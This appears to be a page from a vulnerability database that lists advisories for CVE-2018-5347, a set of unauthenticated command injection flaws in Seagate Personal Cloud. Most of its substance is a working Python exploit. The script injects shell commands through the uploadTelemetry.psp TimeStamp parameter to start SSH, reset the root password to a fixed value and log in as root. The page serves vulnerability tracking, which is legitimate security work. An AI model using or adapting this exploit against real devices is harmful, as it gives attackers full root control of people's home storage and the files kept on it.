Lucene search
K

Seagate Personal Cloud Multiple Vulnerabilities(CVE-2018-5347)

🗓️ 10 May 2018 00:00:00Reported by My SeebugType 
seebug
 seebug
🔗 www.seebug.org👁 74 Views

Seagate Personal Cloud Multiple Vulnerabilities (CVE-2018-5347) with unauthenticated command injection vulnerabilities in Seagate Media Server using Django web framework

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Seagate Personal Cloud - Multiple Vulnerabilities
17 Jan 201800:00
zdt
CNVD
Seagate Personal Cloud Seagate Media Server Command Injection Vulnerability
17 Jan 201800:00
cnvd
CVE
CVE-2018-5347
12 Jan 201801:00
cve
Cvelist
CVE-2018-5347
12 Jan 201801:00
cvelist
NVD
CVE-2018-5347
12 Jan 201801:29
nvd
OpenVAS
Seagate Personal Cloud < 4.3.18.0 RCE Vulnerability
15 Jun 201800:00
openvas
Packet Storm
Seagate Personal Cloud Command Injection
16 Jan 201800:00
packetstorm
Prion
Command injection
12 Jan 201801:29
prion

                                                #!/usr/bin/env python
import os
import urllib
   
scheme = 'http'
host = 'personalcloud.local'
port = '80'
path = 'uploadTelemetry.psp'
querystr = 'TimeStamp=%3b'
#path = 'getLogs.psp'
#querystr = 'time_stamp=%3b'
password = 'Welcome01'
   
cmds = ['ngc --start sshd 2>&1',
      'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}]
   
for cmd in cmds:
   print 'Running command', repr(cmd)
   cmd = urllib.quote_plus(cmd)
   r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd))
   print r.read()
   
print 'Log in with', password
os.system('ssh -p 2222 root@%s' % host)
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation